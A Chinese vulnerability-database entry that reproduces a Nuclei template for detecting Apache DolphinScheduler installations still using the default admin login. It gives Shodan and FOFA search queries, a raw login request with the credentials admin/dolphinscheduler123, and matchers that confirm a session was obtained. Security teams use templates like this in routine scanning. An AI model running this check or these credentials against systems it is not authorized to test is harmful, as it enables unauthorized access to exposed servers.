dolphinscheduler-default-login: Apache DolphinScheduler Default Login

日期: 2025-08-01 | 影响软件: Apache DolphinScheduler | POC: 已公开

漏洞描述

Apache DolphinScheduler default admin credentials were discovered. shodan: http.title:"DolphinScheduler" fofa: title="DolphinScheduler"

PoC代码[已公开]

id: dolphinscheduler-default-login

info:
  name: Apache DolphinScheduler Default Login
  author: For3stCo1d
  severity: high
  description: Apache DolphinScheduler default admin credentials were discovered.
  reference:
    - https://github.com/apache/dolphinscheduler
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
    cpe: cpe:2.3:a:apache:dolphinscheduler:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    shodan-query: http.title:"DolphinScheduler"
    product: dolphinscheduler
    vendor: apache
  tags: apache,dolphinscheduler,default-login,oss,vuln

http:
  - raw:
      - |
        POST /dolphinscheduler/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        userName={{user}}&userPassword={{pass}}

    attack: pitchfork
    payloads:
      user:
        - admin
      pass:
        - dolphinscheduler123

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"msg":"login success"'
          - '"sessionId":'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210099b367cf13564ec1eee2d8d371b140ff1a025dfa7ab0cf0312b0ed32795ef487022100a596c327fb3eceec9563948fa98c9788539caf578911245ffcce82ca7083ff92:922c64590222798bb761d5b6d8e72950

相关漏洞推荐